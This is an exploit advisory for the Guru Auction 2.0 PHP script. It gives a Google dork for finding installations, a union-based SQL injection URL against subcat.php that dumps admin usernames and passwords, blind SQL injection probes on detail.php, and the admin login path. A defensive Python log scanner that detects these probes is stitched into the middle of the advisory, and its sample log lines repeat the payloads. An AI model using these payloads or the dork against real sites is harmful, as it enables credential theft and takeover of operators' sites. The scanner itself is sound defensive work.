Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
Author : v3n0m
Application : Guru Auction 2.0
Price : $49
Vendor : http://www.guruscript.com/
Google Dork : inurl:subcat.php?cate_id=

SQLi p0c:
~~~~~~~~~~
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--+

Blind SQLi p0c:
~~~~~~~~~~
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false

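Both request shapes above leave a clear trace in the web server's access log: `cate_id` and `item_id` are integer identifiers, so any value that is not a bare integer is already suspicious, and the blind variant additionally shows up as a burst of near-identical requests from one client whose response sizes flip between the "true" and "false" page. The following scanner is an added example and is not part of the advisory or of the Guru Auction code; it assumes Apache combined log format, takes the script and parameter names from the PoC URLs above, and runs over a few constructed log lines.

```python
"""Flag the union-based and boolean-based probes from the advisory in access logs.

Added example, not part of the original advisory. Assumes Apache combined
log format; script and parameter names are taken from the PoC URLs.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample log lines: one clean request per script, the union probe,
# and the true/false pair of the boolean probe (note the differing sizes).
SAMPLE_LOG = """\
203.0.113.7 - - [10/May/2009:12:00:01 +0000] "GET /auction/subcat.php?cate_id=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [10/May/2009:12:00:05 +0000] "GET /auction/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--+ HTTP/1.1" 200 731 "-" "Mozilla/5.0"
203.0.113.7 - - [10/May/2009:12:00:09 +0000] "GET /auction/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 HTTP/1.1" 200 4020 "-" "Mozilla/5.0"
203.0.113.7 - - [10/May/2009:12:00:11 +0000] "GET /auction/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 HTTP/1.1" 200 300 "-" "Mozilla/5.0"
198.51.100.4 - - [10/May/2009:12:01:00 +0000] "GET /auction/detail.php?item_id=575 HTTP/1.1" 200 4020 "-" "Mozilla/5.0"
"""

# Assumption: these parameters are integer primary keys in the application.
INTEGER_PARAMS = {"subcat.php": {"cate_id"}, "detail.php": {"item_id"}}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Signatures for the two techniques shown in the advisory, matched against
# the decoded parameter value (what the database would actually see).
SIGNATURES = {
    "union-based": re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.I),
    "boolean-based": re.compile(r"\b(?:and|or)\b\s+(?:substring|substr|mid)\s*\(", re.I),
}


def parse_line(line):
    """Split one combined-format log line into its fields and query parameters."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    url = urlsplit(rec["target"])
    rec["script"] = url.path.rsplit("/", 1)[-1]
    # parse_qsl percent-decodes and turns '+' into spaces, so '+union+all+'
    # becomes ' union all ' before the signatures run.
    rec["params"] = parse_qsl(url.query, keep_blank_values=True)
    rec["size"] = int(rec["size"]) if rec["size"].isdigit() else 0
    return rec


def classify(rec):
    """Return the reasons a parsed request looks like an injection attempt."""
    reasons = []
    expected_int = INTEGER_PARAMS.get(rec["script"], set())
    for name, value in rec["params"]:
        # Type check first: an integer id that is not an integer is the
        # generic signal; it catches payloads the signatures do not know.
        if name in expected_int and not re.fullmatch(r"-?\d+", value.strip()):
            reasons.append(f"{name}: non-integer value for integer parameter")
        for label, sig in SIGNATURES.items():
            if sig.search(value):
                reasons.append(f"{name}: {label}")
    return reasons


def scan(log_text):
    """Return (ip, script, response size, reasons) for every flagged request."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is not None:
            reasons = classify(rec)
            if reasons:
                findings.append((rec["ip"], rec["script"], rec["size"], reasons))
    return findings


def size_spread(findings):
    """Min/max response size per (ip, script) among flagged requests.

    A boolean-based probe reads its answer from the difference between the
    'true' and 'false' page, so a wide spread for one client is itself a signal.
    """
    spread = {}
    for ip, script, size, _ in findings:
        lo, hi = spread.get((ip, script), (size, size))
        spread[(ip, script)] = (min(lo, size), max(hi, size))
    return spread


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for ip, script, size, reasons in hits:
        print(f"{ip} {script} size={size} :: {'; '.join(reasons)}")
    print(size_spread(hits))
```

The type check is deliberately listed before the signatures: the real fix is for the application to cast these ids to integers (or bind them as parameters) before they reach the query, and the same rule applied at the log-review stage flags any non-integer value regardless of which SQL construct follows it.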
Admin login:
~~~~~~~~~~
http://domain.tld/[path]/admin/